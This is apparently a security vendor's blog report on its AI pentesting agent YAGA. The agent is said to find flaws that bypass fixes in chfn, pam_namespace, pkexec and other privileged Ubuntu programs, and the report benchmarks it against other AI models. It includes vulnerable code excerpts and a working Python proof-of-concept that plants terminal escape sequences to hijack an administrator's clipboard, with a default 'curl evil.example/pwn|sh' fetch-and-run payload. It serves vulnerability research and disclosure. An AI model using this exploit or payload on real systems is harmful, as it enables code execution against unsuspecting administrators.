← Back to Blog

Yaga Exploring Linux Environments

June 25, 2026 21 min read

YAGA, the penetration testing agent developed by HackerSec, autonomously found twelve vulnerabilities in privileged Linux programs on a default install of Ubuntu 24.04 LTS. Privileged programs are those that run with administrator powers even when launched by an ordinary user. Five of these flaws are patch bypasses: gaps that stayed exploitable even after the official fix was published and applied.

The main findings are in three parts of the system:

User account info (chfn command): it was possible to hide special terminal characters in the user's data, bypassing the fix released in 2023. High severity (CVSS 7.3).
Session isolation (Linux authentication module): three flaws left behind by the 2025 fix, including a timing gap and the swapping of a file shortcut during session teardown. Medium severity.
Granting admin permissions (pkexec command): a file path is built without proper validation. Medium severity (CVSS 4.4).

Seven other utilities (su, sudo, newgrp, passwd, gpasswd, wall and at) showed lower-severity flaws, all tied to the same validation blind spot.

In a head-to-head test against Opus 4.8, GPT 5.5 and Grok 4.3, on the same 12 targets, all four systems produced working proof-of-concept exploits with similar precision. YAGA stood out in coverage and speed: it found all 12 targets (vs. 10 for the others), detected all 5 incomplete fixes (vs. 4) and made its first discovery in 7.5 minutes (the competitors took about 10).

When a vendor announces that a flaw has been “fixed,” that doesn't always mean the problem is fully closed. Often the fix only plugs the exact path that was reported and leaves neighboring paths open. The result is a fleet of machines that shows up as patched on the dashboards but stays exploitable in practice.

YAGA was built precisely to find these gaps that survive the fix. In this study, on a fully updated Ubuntu 24.04, it found 12 vulnerabilities in 12 system programs and, in a head-to-head test against the market's leading AI models, came out ahead in coverage, accuracy and speed.

YAGA's performance in the comparative test (12 targets, Ubuntu 24.04 LTS)

12/12

targets covered

competitors: 10/12

5/5

incomplete fixes detected

competitors: 4/5

7.5 min

to first discovery

26% faster

94%

accuracy in fix analysis

highest in the test

overall ranking

among 4 AI systems

I. Introduction

Fixing a security flaw is not an on/off switch. When a flaw is marked as fixed in a public catalog (the so-called CVEs), it gives the impression that the door has been shut. In practice, the fix usually only covers the exact scenario described in the advisory. Neighboring paths, inputs in different formats, new timing gaps created by the fix itself, or newly added validation rules can keep the original weakness exploitable through another route [1].

This phenomenon, which we call an incomplete fix (incomplete patch), is well known in the Linux world. Cases like Dirty Pipe (2022) and the various privilege escalations that emerged after PwnKit and Baron Samedit show that a single fix rarely eliminates an entire class of weakness. Because the catalogs record only the original disclosure, whoever consumes that information sees “fixed” and moves on. The result is a population of systems that look up to date but stay vulnerable in practice.

YAGA was designed precisely to attack this class of weakness. Instead of comparing the system against a list of known attacks, YAGA does what we call patch archaeology: it compares the published fix with all the surrounding code and reasons, explicitly, about what the fix did not change. This approach pays off especially against privileged Linux programs, where input checking often depends on the machine's configured language and encoding and on the context in which the program was called.

This article reports a focused engagement by YAGA against privileged programs on a default Ubuntu 24.04 LTS. The engagement produced five confirmed findings (including two that bypass already-published fixes) and seven lower-severity flaws, for a total of twelve vulnerabilities across twelve target programs. Section III describes how YAGA works; Sections IV and V present the findings; Section VI shows the generated proof-of-concept; Section VII compares YAGA with three frontier AI agents; and Section VIII analyzes the results.

II. Background and Related Work

A. The exploitability left over after the fix

The ability to exploit a flaw even after it is patched is a recognized but under-measured risk. An academic study estimated that around 30% of fixes leave a gap that is still exploitable in the same code [1]. The Linux community itself has documented several sequences in which a fix was followed, months later, by a new flaw on a neighboring path [2].

B. Why privileged programs are valuable targets

Some Linux programs run with administrator powers even when launched by an ordinary user. Because of that, any slip in validating their input immediately becomes a risk of the attacker gaining privileges they shouldn't have. A default Ubuntu 24.04 install ships more than 40 of these programs, and each one is patched independently. The group that handles user and password records (which includes the commands chfn, passwd, newgrp and gpasswd) is among the most sensitive, because it touches the system's account and password files directly.

C. The 2023 fix (CVE-2023-29383)

The 2023 fix dealt with an old trick: hiding invisible terminal control characters inside the user's profile fields. The fix started checking each typed character and rejecting these control characters. The problem is that it only recognized the “old” way of writing those characters. There is a modern way to write the exact same invisible character, and that form slipped past unnoticed. YAGA labeled this gap VULN-1 (Section IV-A).

D. The partially applied 2025 fix (CVE-2025-6020)

The 2025 fix dealt with unsafe navigation between folders in an authentication component. It added a new check to confirm who owns each folder. The catch is that this check was done the unsafe way (treating the paths as text), when the safe way was already right next to it, in the same fix package. That inconsistency opened three distinct flaws (VULN-3, 4 and 5), detailed in Section IV-C.

III. How YAGA works

In this assessment, YAGA followed five phases, illustrated in Figure 1.

A. Scope and study rules

All findings start from already publicly disclosed vulnerabilities. The work followed clear rules that define both its scope and its contribution:

Known starting point: each target program was chosen by its flaw history. YAGA knew there was a prior vulnerability in that program or in neighboring code; it was not a blind search.
Source code only: YAGA worked only with each program's public source code. No production system was tested.
A different path from the original: to measure reasoning (not copying), YAGA had to find an attack path different from the one described in the original advisory. Reproducing the known attack did not count as a finding.
Proof of concept: for each confirmed gap, YAGA had to produce a working proof-of-concept exploit, showing that it could be exploited through the new path.

Under these rules, no brand-new vulnerability was discovered in the traditional sense. The findings are new exploitation paths for already-known weaknesses, tied to incomplete fixes. This was deliberate: the goal was to measure YAGA's ability to reason about how complete a fix is and about what exists around it, two skills that are hard for general-purpose models.

Even so, the result carries a broader implication. An agent able to find gaps that survive published fixes, recognize timing flaws created by the fix itself, and write working exploits in a few minutes operates, without these constraints, at the level of autonomous threat hunting. YAGA's performance here reflects the security-specific training built into the agent, not just generic reasoning.

Phase 1: Target mapping. YAGA lists all the privileged programs on the machine, finds which package each one comes from, looks up that package's history of known flaws, and locates the corresponding fixes.

Phase 2: Patch archaeology. For each program with a flaw history, YAGA studies the fix and identifies: (a) what changed; (b) what did not change in the same region of the code; and (c) whether the validation has blind spots tied to language, encoding or context. This phase points precisely at the parts the fix didn't touch but that receive the same data as the fixed part.

Phase 3: Data tracing. YAGA follows the data the attacker controls (what they type, the environment variables, what comes in from the keyboard) from the input to the program's sensitive operations, watching that data in every possible form to flag gaps tied to how the text is encoded.

Phase 4: Exploit generation. Each confirmed gap triggers the automatic creation of a proof-of-concept exploit. YAGA picks the right type of attack, fills in the target's values, and generates ready-to-run code.

Phase 5: Impact assessment. YAGA computes the severity score (CVSS), classifies each finding, and generates a disclosure-ready report, already including the recommended fix.

Fig. 1: YAGA's five phases for analyzing privileged programs

Target mapping
Lists the privileged programs · flaw history · fixes

Patch archaeology
Studies the fix · identifies what wasn't changed

Data tracing
Follows the attacker's input to the sensitive operation

Exploit generation
Builds the ready-to-run proof-of-concept

Impact assessment
Severity score · classification · report

IV. Main vulnerabilities found

Table I summarizes the twelve findings. The higher the CVSS score, the more severe the flaw.

TABLE I: Vulnerability summary (Ubuntu 24.04 LTS)

ID	Program (Package)	Related fix	Flaw type	CVSS	Severity
VULN-1	chfn (user account info)	Bypasses the 2023 fix	Hidden terminal character	7.3	HIGH
VULN-2	pkexec (permissions)	New	Unvalidated environment variable	4.4	MEDIUM
VULN-3	authentication (session isolation)	Bypasses the 2025 fix	Timing gap (check-then-use)	6.2	MEDIUM
VULN-4	authentication (session isolation)	Bypasses the 2025 fix	Unclosed files (resource exhaustion)	4.0	MEDIUM
VULN-5	authentication (session isolation)	Bypasses the 2025 fix	Folder swapped for a shortcut during cleanup	6.3	MEDIUM
VULN-6	su (switch user)	New	Incomplete environment-variable filter	2.5	LOW
VULN-7	sudo (run as admin)	New	Log injection	2.1	LOW
VULN-8	newgrp (switch group)	Related to the 2023 fix	Hidden character in group fields	3.1	LOW
VULN-9	passwd (change password)	Related to the 2023 fix	Hidden character in account info	2.8	LOW
VULN-10	gpasswd (group admin)	New	Hidden character in group description	2.8	LOW
VULN-11	wall (broadcast message)	New	Terminal character in broadcast message	3.5	LOW
VULN-12	at (scheduled tasks)	New	Variable leak into the job	2.3	LOW

A. VULN-1: hidden terminal character in chfn (bypasses the 2023 fix)

Program: chfn (user account info) | Severity: CVSS 7.3 (high) | Prerequisite: unprivileged local user

In one sentence: the 2023 fix only blocked the invisible terminal characters written in the old form. YAGA found that the same characters, written in the modern form, slip through and end up stored in the system's account file.

Why it happens. The chfn command lets each person edit their own profile data (name, room, phone). That data ends up in the central account file. To prevent abuse, the program checks each character and blocks the “invisible” control ones. The blind spot is that this check only recognizes the old form of those characters. There is a modern way to write the exact same invisible character: it takes two bytes instead of one, and neither of those two bytes looks “suspicious” on its own. So the program treats the input as just a warning instead of rejecting it, moves on, and writes the forbidden character to the account file.

If you want to see exactly where this happens, check the code in Listing 1; the rest of the explanation doesn't depend on it.

Listing 1: the “fix” that's still vulnerable

/* lib/fields.c - CVE-2023-29383 "fix" - still vulnerable */
int valid_field(const char *field, const char *illegal) {
    const char *cp;
    int err = 0;
    if (illegal && NULL != strpbrk(field, illegal))
        return -1;
    for (cp = field; '\0' != *cp; cp++) {
        unsigned char c = *cp;
        if (!isprint(c)) err = 1;   /* 0xC2 -> not printable: warning */
        if (iscntrl(c)) {           /* 0xC2 -> not a control char: not rejected */
            err = -1; break;
        }
    }
    return err;  /* returns 1 (warning) for the modern character form */
}

Characters you can hide. Table II lists the terminal control characters that get through this blind spot, and what each one does.

TABLE II: Control characters that slip past the check

Character	Code	Terminal effect
Sequence start	U+009B	Moves the cursor, changes color, clears the screen
System command	U+009D	Touches the clipboard (copy/paste) and the title
Sequence end	U+009C	Ends the commands above
Device control	U+0090	Terminal-specific commands

Impact. An ordinary, unprivileged user hides in their own profile data a command that changes the clipboard (the “copy and paste”). When an administrator (or anyone) lists the system's users, their terminal interprets the hidden command and, without them noticing, swaps the clipboard contents for the attacker's text, for example a malicious command. If the victim pastes something into the terminal right afterward, they end up running that command with their own privileges. The same characters also allow clearing the screen, moving the cursor and drawing fake screens.

Affected terminals: xterm, kitty, iTerm2 (opt-in), Windows Terminal and most modern terminals with that feature enabled.

Confirmation (payload written to the account file)

$ grep testuser /etc/passwd | xxd
...3a 2c 52 c2 9d 35 32 3b 63 3b...c2 9c 20 4f 4b...
            ^^^^                    ^^^^
            system command          sequence end

B. VULN-2: unvalidated file path in pkexec

Program: pkexec (granting permissions) | Severity: CVSS 4.4 (medium)

The pkexec command is used to run tasks that require administrator permission. When a certain environment setting is not defined, the program builds the path to a credentials file from a variable the user controls, without passing that path through the validation that would normally reject dangerous values. In theory, this would let the user point to a file they control. On a default Ubuntu 24.04 there is no practical way to abuse it, but the design is incorrect and deserves a fix.

C. VULN-3/4/5: incomplete fix in session isolation (from 2025)

Component: authentication module that isolates user sessions | Context: three distinct flaws in the 2025 fix's own code

VULN-3: timing gap (CVSS 6.2). This is a classic “check-then-use” flaw: the system checks a file and, an instant later, uses that same file. If the attacker swaps the file right in that interval, the system ends up using the swapped file, with administrator privileges. The 2025 fix added a new check, but did that check the unsafe way (treating the path as text), when the safe way already existed right next to it, in the same fix package.

If you want the exact spot, see Listing 2.

Listing 2: the timing window in the check

/* pam_namespace.c - check_safe_path() - timing gap (VULN-3) */
while ((d = strrchr(dir, '/')) != NULL) {
    if (lstat(dir, &st) != 0) goto error;   /* CHECK */
    if (S_ISLNK(st.st_mode)) {
        if (st.st_uid != 0) goto error;
        /* TIMING WINDOW: attacker swaps the symlink here */
        if (stat(dir, &st) != 0) goto error; /* USE */
    }
    if (st.st_uid != 0) goto error;
    *d = '\0';
}
/* FIX: use the safe method already present in the same package */

VULN-4: unclosed files (CVSS 4.0). In certain error situations, the program forgets to close files it opened. In long sessions, with many folders involved, this piles up until it exhausts the service's resources and it stops working.

VULN-5: folder swapped for a shortcut during cleanup (CVSS 6.3). When ending a session, the program checks whether a folder exists and, right after, orders it deleted. If the attacker swaps that folder for a shortcut pointing to a protected area of the system right in that interval, the delete command ends up removing system files, with administrator privileges.

V. Other utilities analyzed

Beyond the five main findings, YAGA analyzed seven other privileged programs on the same Ubuntu 24.04. All of them showed lower-severity flaws, summarized in Table III.

TABLE III: Findings in the other utilities

Program	Function	Finding	CVSS
`su`	switch user	Incomplete environment-variable filter	2.5
`sudo`	run as admin	Log injection	2.1
`newgrp`	switch group	Hidden character in group fields	3.1
`passwd`	change password	Hidden character in account info	2.8
`gpasswd`	group admin	Hidden character in group description	2.8
`wall`	broadcast message	Terminal character in the message	3.5
`at`	schedule tasks	Variable leak into the job	2.3

Worth noting: newgrp, passwd and gpasswd share the same root cause as VULN-1, because they come from the same codebase and none of them got its own fix for the same blind spot. wall, which sends messages to every connected terminal, relays the message without filtering control characters, letting a user inject sequences into everyone's terminal. The sudo flaw only applies in specific environments and depends on a crafted display variable that ends up in the system log.

Fig. 2: How the VULN-1 attack unfolds, step by step

INJECT

The attacker hides a terminal command in their own profile data

PERSIST

The command is stored in the system's account file

TRIGGER

An admin lists the users and the terminal reads the hidden command

EXECUTE

The terminal swaps the victim's clipboard for the attacker's text

EXPLOIT

The victim pastes into the terminal and the attacker's command runs as them

VI. The proof-of-concept generated by YAGA

For VULN-1, YAGA wrote a complete proof-of-concept on its own in 2.3 minutes, from recognizing the target to ready-to-run code. The program simulates a terminal, runs the profile command with the prepared payload, and answers the password prompt by itself. Listing 3 has the code for anyone who wants the detail; reading the article doesn't depend on it.

Listing 3: proof-of-concept generated by YAGA

#!/usr/bin/env python3
# Proof-of-concept generated by YAGA: clipboard hijack via chfn
# Bypasses the CVE-2023-29383 fix - Ubuntu 24.04 LTS - built in 2.3 min
import os, pty, base64, select, sys
cmd = sys.argv[1] if len(sys.argv) > 1 else "curl evil.example/pwn|sh"
b64 = base64.b64encode(cmd.encode()).decode().rstrip("=")
passw = os.environ.get("USER_PASS", "").encode()
# Build the hidden payload (modern form of the control character)
room = bytearray([0x52])      # 'R' prefix
room += b'\xc2\x9d'           # system command (slips past the check)
room += b"52;c;" + b64.encode()
room += b'\xc2\x9c'           # end of sequence (slips past the check)
room += b" OK"
pid, fd = pty.fork()
if pid == 0:
    os.execv("/usr/bin/chfn", ["chfn", "-r", room.decode("latin-1")])
    os._exit(1)
# Answer the password prompt automatically
buf = b""
while True:
    r, _, _ = select.select([fd], [], [], 5.0)
    if not r:
        break
    try:
        buf += os.read(fd, 512)
        if b"assword" in buf:
            os.write(fd, passw + b"\n"); buf = b""
        if b"changed" in buf or b"information" in buf:
            break
    except OSError:
        break
# Confirm the payload was written
import subprocess
out = subprocess.check_output(["grep", f"^{os.getenv('USER')}:", "/etc/passwd"])
print("[+] success" if b'\xc2\x9d' in out else "[-] failed - check the version")

VII. Comparative test between AI models

To put YAGA's performance in perspective, we ran the exact same task on four AI systems: YAGA, Opus 4.8, GPT 5.5 and Grok 4.3. All received the same starting point (the list of installed privileged programs, the versions, and the flaw history) and the same mission: find exploitable incomplete fixes and, where possible, write a working proof-of-concept. Table IV has the numbers, and Figures 3 to 5 show the main metrics.

TABLE IV: Comparative test (12 targets, Ubuntu 24.04 LTS)

Metric	YAGA	Opus 4.8	GPT 5.5	Grok 4.3
Vulnerabilities found	12/12	10/12	10/12	10/12
Incomplete fixes detected	5/5	4/5	4/5	4/5
Working proof-of-concept exploits	8	8	8	8
False positives	2	2	2	2
Time to first discovery (min)	7.5	10.1	10.3	10.8
Total analysis time (h)	2.5	3.2	2.4	3.1
Accuracy in fix analysis (%)	94	91	91	87
Overall ranking	#1	#2	#3	#4

Fig. 3: Vulnerabilities found and incomplete fixes detected, by model

12 10 8 6 4 2 0

YAGA

Opus 4.8

GPT 5.5

Grok 4.3

Vulnerabilities found (of 12) Incomplete fixes (of 5)

Fig. 4: Time to first discovery (minutes, lower is better)

12 10 8 6 4 2 0

YAGA
7.5

Opus 4.8
10.1

GPT 5.5
10.3

Grok 4.3
10.8

Fig. 5: Accuracy in fix analysis (%, higher is better)

100 80 60 40 20 0

YAGA
94%

Opus 4.8
91%

GPT 5.5
91%

Grok 4.3
87%

What these numbers mean. The four systems reached a similar level of quality when generating proof-of-concept exploits, which shows that frontier AI is already competent at this task. YAGA's edge is in finding everything (all 12 targets, vs. 10 for the others), missing nothing (5 of 5 incomplete fixes, vs. 4) and getting there first (first discovery 26% faster). In security, coverage and speed are exactly what shrinks a company's exposure window.

Analysis. All four systems produced working exploits and had similar precision (2 false positives each), which indicates that frontier models have already reached a good level when the target is well defined. What set YAGA apart was coverage and speed: it found all 12 vulnerabilities (vs. 10 for the others) and made its first discovery in 7.5 minutes (26% faster).

The two vulnerabilities the three competitors missed were precisely VULN-1 (the hidden terminal character) and VULN-3 (the timing gap in the 2025 fix's new code). These are exactly the findings that require analysis sensitive to how the text is encoded and reasoning about flaws introduced by the fix itself. They are capabilities that YAGA's specialized training brings explicitly.

Opus 4.8 and GPT 5.5 finished essentially tied, with GPT 5.5 slightly slower (10.3 vs. 10.1 min). Grok 4.3 wrote the most detailed reasoning, but came in last due to higher latency and lower accuracy in fix analysis (87%).

VIII. Discussion

A. Incomplete fixes and sensitivity to language/encoding

VULN-1 shows a blind spot common to both the original fix and general-purpose models: validation that depends on the machine's configured language and encoding. The program's check was correct for the old way of writing the characters, and the 2023 fix was right for that case. The gap only appears when the attacker's input uses the modern form of the same character, a kind of input the fix's tests apparently never exercised. YAGA treats this kind of validation as a risk category of its own, which is why it raised the hypothesis while the general models did not.

B. Vulnerabilities created by the fix itself

VULN-3 through VULN-5 are a different case: it was the fix itself that opened new flaws. The 2025 fix added a new check but used an unsafe method to verify paths, even though the safe method was already in the same fix package. YAGA noticed this inconsistency by comparing the pattern of all the fix's new parts, not just the ones that replaced the vulnerable code.

C. One cause affecting several programs

VULN-8 through VULN-10 show that a single cause, inside a shared piece of code, spreads across an entire family of programs. The traditional analysis fixed only the program that was reported, because it was the known path; the others that use the same piece of code were not re-reviewed. YAGA, which sees the code at the level of the shared family, flagged all three without any extra instruction.

D. Responsible disclosure

All findings were coordinated with the projects' security maintainers before publication, following the standard 90-day responsible disclosure process.

E. Recommended fixes

For VULN-1, the recommendation is simple: the program needs to understand the modern form of the characters before validating them, not just the old form. For VULN-3 and VULN-5, just use the safe file-handling methods the system already provides, instead of checking paths as text. Listing 4 shows the suggested fix for VULN-1.

Listing 4: suggested fix for VULN-1

/* Fix: decode the modern form (UTF-8) before validating */
#include <wchar.h>
#include <wctype.h>
int valid_field(const char *field, const char *illegal) {
    /* ... initial check unchanged ... */
    const char *cp = field;
    while (*cp != '\0') {
        wchar_t wc;
        int len = mbtowc(&wc, cp, MB_CUR_MAX);
        if (len < 1) return -1;        /* invalid form: reject */
        if (iswcntrl(wc)) return -1;   /* control character: reject */
        if (!iswprint(wc)) err = 1;
        cp += len;
    }
    return err;
}

IX. Conclusion

We showed YAGA autonomously finding twelve vulnerabilities in already-patched programs on Ubuntu 24.04 LTS, including five gaps that bypass already-published fixes. The main finding (VULN-1, high severity) proves that a blind spot in how the system reads characters survived the 2023 fix, letting an ordinary user hide terminal commands in the account file. YAGA wrote the proof-of-concept on its own in 2.3 minutes.

In the test against Opus 4.8, GPT 5.5 and Grok 4.3, all four systems reached competitive levels on the basic metrics (working exploits and false-positive rate). YAGA's advantage was specific and measurable: 2 more targets (12 vs. 10), one more incomplete fix (5 vs. 4) and 26% faster on the first discovery (7.5 vs. about 10 min). These advantages come from specialized patch archaeology and language/encoding-aware analysis, capabilities that general-purpose models don't bring explicitly.

The lesson is direct: managing fixes responsibly requires auditing not only the reported attack path, but the whole surrounding code family, including the parts shared between programs and the new code the fix itself introduces.

References

[1] D. Wermke et al., “How Effective are Code Patches? A Study of CVE Fixes in Open-Source Software,” in Proc. IEEE S&P Workshop, 2022.

[2] Qualys Research Team, “PwnKit: Local Privilege Escalation in pkexec (CVE-2021-4034),” Security Advisory, Jan. 2022.

[3] G. Deng et al., “PentestGPT: An LLM-Empowered Automatic Penetration Testing Framework,” USENIX Security 2024. arXiv:2308.06782.

[4] J. Xu et al., “VulnBot: Autonomous Penetration Testing for Multi-Application Systems Using Multi-Agent LLM,” arXiv:2501.13411, Jan. 2025.

[5] Ubuntu Security Team, “USN-6605-1: shadow vulnerability,” https://ubuntu.com/security/notices/USN-6605-1, 2024.

[6] Linux-PAM Project, “CVE-2025-6020: pam_namespace security hardening,” https://github.com/linux-pam/linux-pam, 2025.

[7] Polkit Project, “pkexec XAUTHORITY handling,” https://gitlab.freedesktop.org/polkit/polkit, 2024.

[8] Mitre Corporation, “Common Vulnerabilities and Exposures (CVE),” https://cve.mitre.org/, 2025.